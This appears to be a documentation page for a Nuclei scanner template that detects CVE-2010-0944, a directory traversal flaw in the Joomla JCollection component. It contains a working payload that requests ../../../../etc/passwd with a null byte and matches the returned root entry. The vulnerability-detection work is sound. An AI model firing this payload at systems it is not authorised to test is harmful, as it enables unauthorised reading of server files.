Joomla! Component com_jcollection - Directory Traversal
ID: CVE-2010-0944
Severity: medium
Author: daffainfo
Tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess
Description
Section titled “Description”A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-0944
info: name: Joomla! Component com_jcollection - Directory Traversal author: daffainfo severity: medium description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. impact: | An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11088 - https://nvd.nist.gov/vuln/detail/CVE-2010-0944 - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt - http://www.exploit-db.com/exploits/11088 - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 epss-percentile: 0.75733 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: thorsten_riess product: com_jcollection tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a00483046022100c9a7f0164cceecbd9b866f1dbfc2e1e880209f1af944d3530246b2f54fa1fdee022100c639f6b4963138a653815d7a2ba6cdd55cec328e0cc1afa4fa80d708181ea6b6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-0944.yaml"